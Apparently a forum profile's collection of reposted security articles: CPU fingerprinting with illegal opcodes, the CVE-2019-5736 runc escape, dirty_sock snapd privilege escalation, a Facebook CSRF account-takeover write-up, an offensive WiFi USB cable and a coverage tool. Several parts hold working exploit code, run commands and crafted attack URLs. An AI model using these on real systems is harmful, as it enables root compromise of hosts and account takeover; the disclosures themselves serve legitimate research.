Everything posted by Nytro

1. Fingerprinting x86 CPUs using Illegal Opcodes

Feb 8, 2019 • julian

x86 CPUs usually identify themselves and their features using the cpuid instruction. But even without looking at their self-reported identity or timing behavior, it is possible to tell CPU microarchitectures apart.

Take for example the ud0 instruction. This instruction is used to generate an Invalid Opcode Exception (#UD). It is encoded with the two bytes 0F FF. If we place this instruction at the end of an executable page in memory and the following page is not executable, we see differences across x86 microarchitectures.

On my Goldmont Plus-based Intel NUC, executing this instruction will indeed cause a #UD exception. On Linux, this exception is delivered as SIGILL. If I retry the same setup on my Skylake desktop, the result is a SIGSEGV instead. This signal is caused by a page fault during instruction fetch, which means that the CPU did not manage to decode this instruction from just the two bytes and tried to fetch more. My somewhat older Broadwell-based laptop behaves the same way.

Using baresifter, we can reverse engineer (more on that in a future blog post) that Skylake and Broadwell actually try to decode ud0 as if it had source and destination operands. After the two opcode bytes, they expect a ModR/M byte and as many additional immediate or displacement bytes as the ModR/M byte indicates. I have put the code for this example on GitHub.

Why would this matter? After all, this behavior is now even documented in the Intel Software Developer's Manual:

Some older processors decode the UD0 instruction without a ModR/M byte. As a result, those processors would deliver an invalid-opcode exception instead of a fault on instruction fetch when the instruction with a ModR/M byte (and any implied bytes) would cross a page or segment boundary.

I have picked an easy example for this post. Beyond this documented difference, there are many other undocumented differences in instruction fetch behavior for other illegal opcodes that make it fairly easy to figure out what microarchitecture we are dealing with. This still applies when a hypervisor intercepts cpuid and changes the (virtual) CPU's self-reported identity. It is also possible to fingerprint different x86 instruction decoding libraries using this approach and narrow down which hypervisor software stack is used.

One use case I can think of is malware that is tailored to recognize its target using instruction fetch fingerprinting. Let's say the malware's target is an embedded system with an ancient x86 CPU. If the malware actively fingerprints the CPU, it can avoid deploying its payload in an automated malware analysis system and being discovered there, unless the analysis is performed on the exact same type of system the malware targets.

Sursa: https://x86.lol/generic/2019/02/08/fingerprint.html
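To make the experiment concrete, here is a minimal sketch of the setup described above (my own illustration, not the author's GitHub code; it assumes Linux on x86-64 and that the instruction-fetch fault is delivered as SIGSEGV):

```c
/* ud0_fingerprint.c - place ud0 (0F FF) in the last two bytes of an
 * executable page, make the next page inaccessible, and see which
 * signal the CPU's decode behavior produces. */
#include <setjmp.h>
#include <signal.h>
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h>

static sigjmp_buf env;
static volatile sig_atomic_t caught;

static void handler(int sig) {
    caught = sig;
    siglongjmp(env, 1);  /* sigsetjmp(..., 1) restores the signal mask */
}

int main(void) {
    long page = sysconf(_SC_PAGESIZE);
    unsigned char *buf = mmap(NULL, 2 * page, PROT_READ | PROT_WRITE,
                              MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (buf == MAP_FAILED)
        return 1;

    buf[page - 2] = 0x0F;  /* ud0 opcode, last two bytes of the first page */
    buf[page - 1] = 0xFF;
    mprotect(buf, page, PROT_READ | PROT_EXEC);   /* first page: executable */
    mprotect(buf + page, page, PROT_NONE);        /* second page: no fetch  */

    signal(SIGILL, handler);
    signal(SIGSEGV, handler);
    if (sigsetjmp(env, 1) == 0)
        ((void (*)(void))(buf + page - 2))();     /* jump to the ud0 */

    if (caught == SIGILL)
        puts("SIGILL: ud0 decoded from two bytes (e.g. Goldmont Plus)");
    else
        puts("SIGSEGV: decoder fetched past the page (e.g. Broadwell/Skylake)");
    return 0;
}
```

Per the post, the first branch is what a Goldmont Plus machine should print, and the second is what Broadwell and Skylake should print.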
2. Wednesday, February 13, 2019

CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host

Introduction

The inspiration for the following research was a CTF task called namespaces by _tsuro from the 35C3 CTF. While solving this challenge we found out that creating namespace-based sandboxes which can then be joined by external processes is a pretty challenging task from a security standpoint. On our way back home from the CTF we realized that Docker, with its "docker exec" functionality (which is actually implemented by runc from opencontainers), follows a similar model, and we decided to challenge this implementation.

Goal and results

Our goal was to compromise the host environment from inside a Docker container running in the default or a hardened configuration (e.g. limited capabilities and syscall availability). We considered the following two attack vectors: a malicious Docker image, and a malicious process inside a container (e.g. a compromised Dockerized service running as root).

Results: we achieved full code execution on the host, with all capabilities (i.e. at the administrative 'root' access level), triggered by either running "docker exec" from the host on a compromised Docker container, or starting a malicious Docker image. This vulnerability was assigned CVE-2019-5736 and was officially announced here.

Default Docker security settings

Despite Docker not being marketed as sandboxing software, its default setup is meant to secure host resources from being accessed by processes inside of a container. Although the initial process inside a Docker container runs as root, it has very limited privileges, which is achieved using several mechanisms (this paper describes them thoroughly):

- Linux capabilities (http://man7.org/linux/man-pages/man7/capabilities.7.html) - Docker containers have a very limited set of capabilities by default, which makes a container root user a de facto unprivileged user.
- seccomp (http://man7.org/linux/man-pages/man2/seccomp.2.html) - This mechanism blocks a container's processes from executing a subset of syscalls, or filters their arguments (thus limiting their impact on the host environment).
- namespaces (http://man7.org/linux/man-pages/man7/namespaces.7.html) - This mechanism limits containerized processes' access to the host filesystem, as well as the visibility of processes across the host/container boundary.
- cgroups (http://man7.org/linux/man-pages/man7/cgroups.7.html) - The control groups (cgroups) mechanism limits and manages various types of resources (RAM, CPU, ...) for a group of processes.

It's possible to disable all of these mechanisms (for example by using the --privileged command-line option) or to specify any set of syscalls/capabilities/shared namespaces explicitly. Disabling those hardening mechanisms makes it easy to escape the container. Instead, we will be looking at Docker containers running the default security configuration.

Failed approaches

Before we ended up finding the final vulnerability we had tried many other ideas, most of which were mitigated by limited capabilities or by seccomp filters. As the whole research was a follow-up to a 35C3 CTF task, we started by investigating what happens when a new process gets started in an existing namespace (a.k.a. "docker exec"). The goal here was to check whether we could access some host resources by obtaining them from the newly joined process. Specifically, we looked for ways to access that process from inside the container before it joins all of the namespaces it is meant to use.
Imagine the following scenario, where a process: joins the user and PID namespaces, forks (to actually join the PID namespace), and then joins the rest of the namespaces (mount, net etc.). If we could ptrace that process as soon as it is visible to us (i.e. right as it joins the PID namespace), we could prevent it from joining the rest of the namespaces, which would in turn enable e.g. host filesystem access. Not having the required capabilities to ptrace could be bypassed by having the container init process unshare its user namespace (this yields the full set of capabilities in the new user namespace). Then "docker exec" would join our new namespace (obtained via "/proc/pid/ns/"), inside of which we can ptrace (though seccomp limitations would still apply). It turns out that runc joins all of the required namespaces and only forks after having done so, which prevents this attack vector. Additionally, the default Docker configuration disables all namespace-related syscalls within the container (setns, unshare etc.).

Next we focused solely on the proc filesystem (more info: proc(5)), as it's quite special and can often cross namespace boundaries. The most interesting entries are:

- /proc/pid/mem - This doesn't give us much by itself, as the target process needs to already be in the same PID namespace as the malicious one. The same applies to ptrace(2).
- /proc/pid/cwd, /proc/pid/root - Before a process fully joins a container (after it joins the namespaces but before it updates its root (chroot) and cwd (chdir)), these point to the host filesystem, which could possibly allow us to access it - but since the runc process is not dumpable (read more: http://man7.org/linux/man-pages/man2/ptrace.2.html), we cannot use those.
- /proc/pid/exe - Not of any use just by itself (same reason as cwd and root), but we found a way around that and used it in the final exploit (described below).
- /proc/pid/fd/ - Some file descriptors may be leaked from ancestor namespaces (especially the mount namespace), or we could disturb parent-child (actually grandchild) communication in runc - we found nothing of particular interest here, as synchronisation was done with local sockets (we can't reuse those).
- /proc/pid/map_files/ - A very interesting vector - before runc executes the target binary (but after the process is visible to us, i.e. after it joins the PID namespace), all the entries refer to binaries from the host filesystem (since that is where the process was originally spawned). Unfortunately, we discovered that we cannot follow these links without the SYS_ADMIN capability (source) - even from within the same process.

Side note: when executing the following command:

/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 /bin/ls -al /proc/self/exe

"/proc/self/exe" points to "ld-linux-x86-64.so.2" (not "/bin/ls", as one might think).

The attack idea was to force "docker exec" to use the dynamic loader from the host to execute a binary inside the container, by replacing the original exec target (e.g. "/bin/bash") with a text file whose first line is:

#!/proc/self/map_files/<address-in-memory-of-ld.so> /evil_binary

Then /evil_binary could overwrite /proc/self/exe and thus overwrite the host ld.so. This approach was unsuccessful due to the aforementioned SYS_ADMIN capability requirement.
Side note 2: while experimenting with the above we found a deadlock in the kernel: when a regular process tries to execve "/proc/self/map_files/any-existing-entry", it will deadlock (and then opening "/proc/that-process-pid/maps" from any other process will also hang - probably some lock is taken and never released).

Successful approach

The final successful attempt involved an approach very similar to the aforementioned idea with /proc/self/map_files - we execute /proc/self/exe, which is the host's docker-runc binary, while still being able to inject some code (we did that by changing some shared library, like libc.so, to also execute our code, e.g. inside __libc_start_main or a global constructor). This gives us the ability to overwrite the /proc/self/exe binary - the docker-runc binary from the host - which in turn gives us full-capability root access on the host the next time docker-runc is executed.

Detailed attack description. Craft a rogue image or compromise a running container:

- Make the entrypoint binary (or any binary the user is likely to specify at runtime as the entrypoint, or to run as part of docker exec) a symlink to /proc/self/exe.
- Replace any dynamic library used by docker-runc with a custom .so that has an additional global constructor. This function opens /proc/self/exe (which points to the host docker-runc) for reading (it is impossible to open it for writing, since the binary is being executed right now - see ETXTBSY in open(2)). Then this function executes another binary which opens /proc/self/fd/3 (the file descriptor of docker-runc opened before execve), this time for writing, which succeeds because docker-runc is no longer being executed. The code can then overwrite the host docker-runc with anything - we chose a fake docker-runc with an additional global constructor that runs arbitrary code.

Thus, when a host user runs the compromised image or "docker exec" on a compromised container:

- The entrypoint/exec binary that has been symlinked to /proc/self/exe (which in turn points to docker-runc on the host filesystem) begins executing within the container (this also causes the process to become dumpable, as execve sets the dumpable flag). To be clear: this causes the original docker-runc process to re-execute into a new docker-runc running within the container (but using the host binary).
- When docker-runc begins executing for the second time, it loads .so files from the container, not the host (because that is the visible filesystem now). As a reminder: we control the contents of these dynamic libraries.
- The malicious global constructor function is executed. It opens /proc/self/exe for reading (say it gets file descriptor 3) and execve()s some attacker-controlled binary (say /evil).
- /evil overwrites docker-runc on the host filesystem (by reopening fd 3, this time with write access) with a backdoored/malicious docker-runc (e.g. one with an additional global constructor).
- Now, when any container is started or another exec is done, the attacker's fake docker-runc is executed as root with full capabilities on the host filesystem (this binary is responsible for dropping privileges and entering namespaces, so initially it has full permissions).

Note that this attack only abuses runc (opencontainers) behavior, so it should work for Kubernetes as well, regardless of whether it uses Docker or CRI-O (both may use runc internally). This attack has serious impact on AWS and GCP cloud services; more information about it can be found in the linked security bulletins.
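To make the two pieces concrete - the constructor injected into a library docker-runc loads, and the /evil helper that reopens the read-only descriptor for writing - here is a hedged C sketch. The /evil path, the shell-script payload, and the assumption that the descriptor lands on fd 3 are illustrative; this follows the published technique, not the authors' exact PoC:

```c
/* evil_lib.c - build with: gcc -shared -fPIC -o evil_lib.so evil_lib.c
 * Dropped over a shared library that docker-runc loads from the container. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <unistd.h>

__attribute__((constructor))
static void hijack(void) {
    /* We run inside the re-executed host docker-runc. O_WRONLY would fail
     * with ETXTBSY while the binary executes, so take a read-only fd and
     * let it survive the execve (assumed to land on fd 3). */
    if (open("/proc/self/exe", O_RDONLY) < 0)
        _exit(1);
    char *argv[] = { "/evil", NULL };
    execve("/evil", argv, NULL);  /* this process no longer executes runc */
}

/* evil.c - built statically as /evil inside the container image. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <unistd.h>

int main(void) {
    /* Illustrative payload only; a real attack would plant a full binary. */
    const char payload[] = "#!/bin/sh\n# attacker-controlled code runs here\n";
    int fd = -1;
    /* /proc/self/fd/3 still resolves to the host docker-runc; retry the
     * write-open until the old runc image finishes exiting (ETXTBSY). */
    while (fd < 0)
        fd = open("/proc/self/fd/3", O_WRONLY | O_TRUNC);
    write(fd, payload, sizeof(payload) - 1);
    close(fd);
    return 0;
}
```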
Responsible disclosure

We reported the vulnerability to security@docker.com the same day we discovered it, including a detailed attack description and a proof-of-concept exploit. The next day the Docker security team forwarded our email to security@opencontainers.org. We also actively participated in discussions regarding fixing the vulnerability. Communicating with the Docker and OpenContainers security teams was frictionless and pleasant.

Rejected fix ideas in runc

1. Open the destination binary, compare inode info from fstat(2) with /proc/self/exe and exit if they match; otherwise execveat on the destination binary's fd. This would detect whether the destination binary is a symlink to /proc/self/exe. Why execveat? Because we want to avoid the race condition where, between the comparison and the exec, some other process replaces the destination binary with a link to /proc/self/exe.

Why wouldn't this work? It can be bypassed if the attacker does not use a symlink but instead a binary whose interpreter points to "/proc/self/exe": e.g. a text file which has "#!/proc/self/exe" as its first line, or just an ELF file with that interpreter.

2. Use a static binary to launch processes within the container. The idea here is to remove the possibility of code execution via malicious .so files inside the container (a static binary means no .so files are loaded).

Why wouldn't this work? Replacing .so files was not actually needed for this exploit. After the re-exec of /proc/self/exe (docker-runc), another process can just open /proc/<pid-of-docker-runc>/exe, which is possible because the "dumpable" flag is set on execve. This is a little bit harder to exploit because it requires winning a race between the re-exec completing and the runc process exiting (due to no parameters being given). In practice, the race window is so large that we were able to develop a 100% successful exploit for this scenario as well. However, this fix would have eliminated one of the attack vectors: running a rogue image.

Final fix applied in runc

In the end, the following fix was applied to mitigate the vulnerability:

- Create a memfd (a special file which exists only in memory).
- Copy the original runc binary to this fd.
- Before entering namespaces, re-exec runc from this fd.

This fix guarantees that if the attacker overwrites the binary pointed to by /proc/self/exe, it will not cause any damage to the host, because that binary is a copy of the host binary, stored entirely in memory (tmpfs).

Mitigations

There are several mitigation possibilities when using an unpatched runc:

- Use Docker containers with SELinux enabled (--selinux-enabled). This prevents processes inside the container from overwriting the host docker-runc binary.
- Use a read-only file system on the host, at least for storing the docker-runc binary.
- Use a low-privileged user inside the container, or a new user namespace with uid 0 mapped to that user (then that user should not have write access to the runc binary on the host).

Timeline

- 1 January 2019 - Vulnerability discovered and PoC created
- 1 January - Vulnerability reported to security@docker.com
- 2 January - Report forwarded by the Docker security team to security@opencontainers.org
- 3-5 January - Discussion about fix ideas
- 11 February - End of CVE-2019-5736 embargo
- 13 February - Publication of this post

Authors: Adam Iwaniuk, Borys Popławski

Posted by Adam Iwaniuk at 00:42

Sursa: https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html
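The memfd idea from the final fix is simple enough to sketch in C (runc's actual fix lives in its own codebase; this is just the mechanism, with error handling elided and glibc >= 2.27 assumed for memfd_create):

```c
/* Re-exec ourselves from a sealed in-memory copy, so that /proc/self/exe
 * no longer aliases the on-disk host binary once we enter the container. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <sys/stat.h>
#include <unistd.h>

void reexec_from_memfd(char **argv, char **envp) {
    int self = open("/proc/self/exe", O_RDONLY | O_CLOEXEC);
    int mem  = memfd_create("runc_clone", MFD_CLOEXEC | MFD_ALLOW_SEALING);

    struct stat st;
    fstat(self, &st);
    for (off_t off = 0; off < st.st_size; )           /* copy the binary */
        if (sendfile(mem, self, &off, st.st_size - off) <= 0)
            return;

    /* Seal the copy so even a root process in the container can't alter it. */
    fcntl(mem, F_ADD_SEALS,
          F_SEAL_SHRINK | F_SEAL_GROW | F_SEAL_WRITE | F_SEAL_SEAL);
    fexecve(mem, argv, envp);                         /* no return on success */
}
```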
3. # Usage

Edit HOST inside `payload.c`, compile with `make`. Start `nc` and run `pwn.sh` inside the container.

# Notes

- This exploit is destructive: it'll overwrite the `/usr/bin/docker-runc` binary *on the host* with the payload. It'll also overwrite `/bin/sh` inside the container.
- Tested only on Debian 9.
- No attempts were made to make it stable or reliable; it's only tested to work when a `docker exec <id> /bin/sh` is issued on the host.

More complete explanation [here](https://github.com/lxc/lxc/commit/6400238d08cdf1ca20d49bafb85f4e224348bf9d).

Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46359.zip

Sursa: https://www.exploit-db.com/exploits/46359
4. # dirty_sock: Privilege Escalation in Ubuntu (via snapd)

In January 2019, current versions of Ubuntu Linux were found to be vulnerable to local privilege escalation due to a bug in the snapd API. This repository contains the original exploit POC, which is being made available for research and education. For a detailed walkthrough of the vulnerability and the exploit, please refer to the [blog posting here](https://initblog.com/2019/dirty-sock/).

You can easily check if your system is vulnerable. Run the command below. If your `snapd` is 2.37.1 or newer, you are safe.

```
$ snap version
...
snapd 2.37.1
...
```

# Usage

## Version One (use in most cases)

This exploit bypasses access control checks to use a restricted API function (POST /v2/create-user) of the local snapd service. It queries the Ubuntu SSO for the username and public SSH key associated with a provided email address, and then creates a local user based on these values.

Successful exploitation for this version requires an outbound Internet connection and an SSH service accessible via localhost.

To exploit, first create an account at the [Ubuntu SSO](https://login.ubuntu.com/). After confirming it, edit your profile and upload an SSH public key. Then, run the exploit like this (with the SSH private key corresponding to the public key you uploaded):

```
python3 ./dirty_sockv1.py -u "you@yourmail.com" -k "id_rsa"

[+] Slipped dirty sock on random socket file: /tmp/ktgolhtvdk;uid=0;
[+] Binding to socket file...
[+] Connecting to snapd API...
[+] Sending payload...
[+] Success! Enjoy your new account with sudo rights!

[Script will automatically ssh to localhost with the SSH key here]
```

## Version Two (use in special cases)

This exploit bypasses access control checks to use a restricted API function (POST /v2/snaps) of the local snapd service. This allows the installation of arbitrary snaps. Snaps in "devmode" bypass the sandbox and may include an "install hook" that is run in the context of root at install time.

dirty_sockv2 leverages the vulnerability to install an empty "devmode" snap including a hook that adds a new user to the local system. This user will have permissions to execute sudo commands.

As opposed to version one, this does not require the SSH service to be running. It will also work on newer versions of Ubuntu with no Internet connection at all, making it resilient to changes and effective in restricted environments. This exploit should also be effective on non-Ubuntu systems that have installed snapd but that do not support the "create-user" API due to incompatible Linux shell syntax.

Some older Ubuntu systems (like 16.04) may not have the snapd components installed that are required for sideloading. If this is the case, this version of the exploit may trigger snapd to install those dependencies. During that installation, snapd may upgrade itself to a non-vulnerable version. Testing shows that the exploit is still successful in this scenario. See the troubleshooting section for more details.

To exploit, simply run the script with no arguments on a vulnerable system.

```
python3 ./dirty_sockv2.py

[+] Slipped dirty sock on random socket file: /tmp/gytwczalgx;uid=0;
[+] Binding to socket file...
[+] Connecting to snapd API...
[+] Deleting trojan snap (and sleeping 5 seconds)...
[+] Installing the trojan snap (and sleeping 8 seconds)...
[+] Deleting trojan snap (and sleeping 5 seconds)...

********************
Success!
You can now `su` to the following account and use sudo:
   username: dirty_sock
   password: dirty_sock
********************
```

# Troubleshooting

If using version two, and the exploit completes but you don't see your new account, this may be due to some background snap updates. You can view these by executing `snap changes` and then `snap change #`, referencing the line showing the install of the dirty_sock snap. Eventually, these should complete and your account should be usable.

Version one seems to be the easiest and fastest, if your environment supports it (SSH service running and accessible from localhost).

Please open issues for anything weird.

# Disclosure Info

The issue was reported directly to the snapd team via Ubuntu's bug tracker. You can read the full thread [here](https://bugs.launchpad.net/snapd/+bug/1813365).

I was very impressed with Canonical's response to this issue. The team was awesome to work with, and overall the experience makes me feel very good about being an Ubuntu user myself.

Public advisory links:

- https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/SnapSocketParsing
- https://usn.ubuntu.com/3887-1/

Proof of Concept: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46360.zip

Sursa: https://www.exploit-db.com/exploits/46360
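To make the "dirty sock" itself concrete: snapd derived the requester's uid by string-parsing the peer socket's address, so a client that binds its own end of the AF_UNIX connection to a path containing ";uid=0;" gets treated as root. A minimal C sketch of that trick follows (my illustration of the mechanism described above; the JSON body is abbreviated and illustrative - the real PoCs linked above do considerably more):

```c
/* dirty_sock_sketch.c - bind the client socket to a ";uid=0;" path, then
 * talk HTTP to the snapd control socket as if we were root. */
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <unistd.h>

int main(void) {
    int s = socket(AF_UNIX, SOCK_STREAM, 0);
    struct sockaddr_un me    = { .sun_family = AF_UNIX };
    struct sockaddr_un snapd = { .sun_family = AF_UNIX };
    strcpy(me.sun_path, "/tmp/whatever;uid=0;");   /* the dirty sock */
    strcpy(snapd.sun_path, "/run/snapd.socket");

    unlink(me.sun_path);
    bind(s, (struct sockaddr *)&me, sizeof(me));   /* client-side bind */
    connect(s, (struct sockaddr *)&snapd, sizeof(snapd));

    const char body[] = "{\"email\":\"you@yourmail.com\",\"sudoer\":true}";
    char req[512];
    int n = snprintf(req, sizeof(req),
                     "POST /v2/create-user HTTP/1.1\r\n"
                     "Host: 127.0.0.1\r\n"
                     "Content-Type: application/json\r\n"
                     "Content-Length: %zu\r\n\r\n%s",
                     strlen(body), body);
    write(s, req, n);

    char resp[4096];
    ssize_t got = read(s, resp, sizeof(resp) - 1);
    if (got > 0) { resp[got] = '\0'; puts(resp); }  /* snapd's reply */
    close(s);
    return 0;
}
```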
5. Posted on February 12, 2019 by qw

Facebook CSRF protection bypass which leads to Account Takeover

This bug could have allowed malicious users to send requests with CSRF tokens to arbitrary endpoints on Facebook, which could lead to the takeover of victims' accounts. For this attack to be effective, an attacker would have to trick the target into clicking a link.

Demonstration

This is possible because of a vulnerable endpoint which takes another Facebook endpoint selected by the attacker, along with its parameters, and makes a POST request to that endpoint after adding the fb_dtsg parameter. This endpoint is also located under the main domain www.facebook.com, which makes it easier for the attacker to trick victims into visiting the URL.

The vulnerable endpoint is:

https://www.facebook.com/comet/dialog_DONOTUSE/?url=XXXX

where XXXX is the endpoint (with parameters) to which the POST request is going to be made (the CSRF token fb_dtsg is added automatically to the request body).

This allowed me to perform many actions if the victim visits these URLs. Some of them are:

Make a post on the timeline:

https://www.facebook.com/comet/dialog_DONOTUSE/?url=/api/graphql/%3fdoc_id=1740513229408093%26variables={"input":{"actor_id":{TARGET_ID},"client_mutation_id":"1","source":"WWW","audience":{"web_privacyx":"REDECATED"},"message":{"text":"TEXT","ranges":[]}}}

Delete a profile picture:

https://www.facebook.com/comet/dialog_DONOTUSE/?url=/profile/picture/remove_picture/%3fdelete_from_album=1%26profile_id={TARGET_ID}

Trick the user into deleting their account (after changing the language with the "locale" parameter):

https://www.facebook.com/comet/dialog_DONOTUSE/?url=/help/delete_account/dialog/%3f__asyncDialog=0%26locale=fr_FR

This will prompt a password confirmation dialog; if the victim enters their password, their account will be deleted.

Account Takeover Approach

To take over the account, we have to add a new email address or phone number to the victim's account. The problem here is that the victim has to visit two separate URLs, one to add the email/phone and one to confirm it, because the "normal" endpoints used to add emails or phone numbers don't have a "next" parameter to redirect the user after a successful request. So to bypass this, I needed to find endpoints where the "next" parameter is present, so the account takeover could be made with a single URL.

1) We authorize the attacker's app as the user, then we redirect to https://www.facebook.com/v3.2/dialog/oauth which will automatically redirect to the attacker's website with an access_token having the scopes allowed to that app (this happens without user interaction because the app is already authorized, using the endpoint /ajax/appcenter/redirect_to_app). This URL should be sent to the user:

https://www.facebook.com/comet/dialog_DONOTUSE/?url=/ajax/appcenter/redirect_to_app%3fapp_id={ATTACKER_APP}%26ref=appcenter_top_grossing%26redirect_uri=https%3a//www.facebook.com/v3.2/dialog/oauth%3fresponse_type%3dtoken%26client_id%3d{ATTACKER_APP}%26redirect_uri%3d{DOUBLE_URL_ENCODED_LINK}%26scope%3d&preview=0&fbs=125&sentence_id&gift_game=0&scopes[0]=email&gdpv4_source=dialog

This step is needed for multiple things: first, to use the endpoint /v3.2/dialog/oauth to bypass Facebook's redirect protection in the "next" parameter, which blocks redirect attempts to external websites even if they are made using linkshim; second, to identify each victim using the token received, which will help later to extract the confirmation code for that specific user.
2) The attacker's website receives the access token of the user, creates an email address for them under that domain, and redirects the user to:

https://www.facebook.com/comet/dialog_DONOTUSE/?url=/add_contactpoint/dialog/submit/%3fcontactpoint={EMAIL_CHOSEN}%26next=/v3.2/dialog/oauth%253fresponse_type%253dtoken%2526client_id%253d{ATTACKER_APP}%2526redirect_uri%253d{DOUBLE_URL_ENCODED_LINK}

This URL does the following: first, it links an email to the user's account using the endpoint /add_contactpoint/dialog/submit/ (no password confirmation is required). After the linking, it redirects to the endpoint selected in the "next" parameter:

"/v3.2/dialog/oauth?response_type=token&client_id={ATTACKER_APP}&redirect_uri={ATTACKER_DOMAIN}"

which will redirect to the "ATTACKER_DOMAIN" again with the user's access_token.

3) The attacker's website receives the "access_token", extracts the user ID, searches for the email received for that user, gets the confirmation link, and redirects again to:

https://www.facebook.com/confirmcontact.php?c={CODE}&z=0&gfid={HASH}

(CODE and HASH are in the email received from Facebook.) This method is simpler for the attacker, but after the linking the endpoint redirects the victim to https://www.facebook.com/settings?section=email, which exposes the newly added email - so the confirmation could instead be done using the /confirm_code/dialog/submit/ endpoint, which has a "next" parameter that can redirect the victim to the home page after the confirmation is made.

4) The email is now added to the victim's account; the attacker can reset the password and take over the account.

The attack seems long, but it's done in the blink of an eye, and it's dangerous because it doesn't target a specific user but anyone who visits the link in step 1 (this is done with simple scripts hosted on the attacker's website).

Timeline

Jan 26, 2019 — Report sent
Jan 26, 2019 — Acknowledged by Facebook
Jan 28, 2019 — More details sent
Jan 31, 2019 — Fixed by Facebook
Feb 12, 2019 — $25,000 bounty awarded by Facebook

Sursa: https://ysamm.com/?p=185
6. New Offensive USB Cable Allows Remote Attacks over WiFi

By Lawrence Abrams, February 11, 2019, 12:27 PM

Like a scene from a James Bond or Mission Impossible movie, a new offensive USB cable plugged into a computer could allow attackers to execute commands over WiFi as if they were using the computer's keyboard.

When plugged into a Linux, Mac, or Windows computer, this cable is detected by the operating system as a HID, or human interface device. As HID devices are considered input devices by an operating system, they can be used to input commands as if they were being typed on a keyboard.

Created by security researcher Mike Grover, who goes by the alias _MG_, the cable includes an integrated WiFi PCB that was created by the researcher. This WiFi chip allows an attacker to connect to the cable remotely to execute commands on the computer or manipulate the mouse cursor.

PCB with Embedded WiFi Chip

In a video demonstration by Grover, you can see how the researcher simply plugs the cable into a PC and is able to connect to it remotely to issue commands through an app on his mobile phone.

In an interview with BleepingComputer, Grover explained that when plugged in, the cable is seen as a keyboard and a mouse. This means an attacker can input commands regardless of whether the device is locked or not. Even scarier, if the computer normally locks a session using an inactivity timer, the cable can be configured to simulate user interaction to prevent this.

"It "works" just like any keyboard and mouse would at a lock screen, which means you can type and move the mouse," Grover told BleepingComputer. "Therefore, if you get access to the password you can unlock the device. Also, if the target relies on an inactivity timer to auto lock the machine, then it's easy to use this cable to keep the lock from initiating by simulating user activity that the user would not notice otherwise (tiny mouse movements, etc)."

Grover further told BleepingComputer that these WiFi chips can be preconfigured to connect to a WiFi network and potentially open reverse shells to a remote computer. This could allow attackers in remote locations to execute commands that grant further visibility into the computer when not in the vicinity of the cable.

The app that issues commands to the O·MG cable is being developed collaboratively, according to a blog post by Grover. The developers hope to port the ESPloitV2 tool for use in the cable.

WiFi deauthentication attacks may also be possible

While the HID attack can be prevented using a USB condom, which blocks data transmission between the cable and the computer, Grover told BleepingComputer that the cable could still be used for WiFi deauthentication attacks. WiFi deauth attacks are used to disconnect nearby wireless devices from an access point by sending deauthentication frames from spoofed MAC addresses.

Grover envisions that a deauth attack can be used in scenarios where the attacker does not have access to a location to perform an attack, but the victim's plugged-in cable does. This could allow a remote attacker to create a physical diversion while allowing another remote attack, which might otherwise have been noticed, to slip by.

As an example, Grover illustrated the following scenario:

"You aren't in range of a wireless target, but the target person is. Using this cable, you can get them to carry the attack hardware inside a controlled area. Maybe to disrupt a camera? Maybe a fun disruption/diversion for another attack.
(Imagine distributing a dozen inside an office and suddenly IT/Sec is focused on the chaos)."

Researcher hopes to sell the cable

This cable is not currently for sale, but Grover hopes to sell it to other security researchers in the future. Grover told BleepingComputer that he has spent approximately $4,000, and over 300 hours of research, on creating the needed WiFi PCBs and adding them to the cable.

This was done using a desktop mill, which is typically not used to create high-quality PCBs in a DIY environment. Due to this, many users were surprised by the quality of Grover's chips, and Bantam, the manufacturer of the mill, reached out to learn how the researcher was able to do it.

PCBs printed in various colors by Grover

The researcher still wants to make more changes before sending the cable off for production.

Sursa: https://www.bleepingcomputer.com/news/security/new-offensive-usb-cable-allows-remote-attacks-over-wifi/
7. # Summary

Mesos is a tool to gather binary code coverage on all user-land Windows targets without need for source or recompilation. It also provides an automatic mechanism to save a full minidump of a process if it crashes under mesos.

Mesos is technically just a really fast debugger, capable of handling tens of millions of breakpoints. Using this debugger, we apply breakpoints to every single basic block in a program. These breakpoints are removed as they are hit. Thus, mesos converges to 0-cost coverage, as gathering coverage only has a cost the first time a basic block is hit.

# Why?

This is effectively the successor of my 5+ year old Chrome IPC fuzzer. It doesn't have any fuzz components in it, but it is a high-performance debugger. This debugger can apply millions of breakpoints to gather coverage, and handle thousands of breakpoints per second to modify memory to inject inputs. This strategy has worked out well for me historically and is still my go-to tooling for fuzzing targets on live systems.

Out of the box it can be used to gather simple code coverage, but it's designed to be easily modified to add fast breakpoint handlers to inject inputs. For example, put a breakpoint after NtReadFile() returns and modify the buffer in flight. I used this in Chrome to modify inbound IPC traffic in the browser.

# Features

- Code coverage
- Automatic full minidump saving
- IDA coloring

# Quick Usage Guide

Set %PATH% such that idat64.exe is in it:

```
path %PATH%;"C:\Program Files\IDA 7.2"
```

Generate mesos (the first time will be slow):

```
powershell .\offline_meso.ps1 <pid>
python generate_mesos.py process_ida
```

Gather coverage on target!

```
cargo build --release
target\release\mesos.exe <pid>
```

Applying 1.6 million breakpoints? No big deal.

```
C:\dev\mesos>target\release\mesos.exe 13828
mesos  is 64-bit: true
target is 64-bit: true
[ 0.003783] Applied 5629 breakpoints ( 5629 total breakpoints) notepad.exe
[ 0.028071] Applied 61334 breakpoints ( 66963 total breakpoints) ntdll.dll
[ 0.035298] Applied 25289 breakpoints ( 92252 total breakpoints) kernel32.dll
[ 0.058815] Applied 55611 breakpoints ( 147863 total breakpoints) kernelbase.dll
...
[ 0.667417] Applied 11504 breakpoints ( 1466344 total breakpoints) oleacc.dll
[ 0.676151] Applied 19557 breakpoints ( 1485901 total breakpoints) textinputframework.dll
[ 0.705431] Applied 66650 breakpoints ( 1552551 total breakpoints) coreuicomponents.dll
[ 0.717276] Applied 25202 breakpoints ( 1577753 total breakpoints) coremessaging.dll
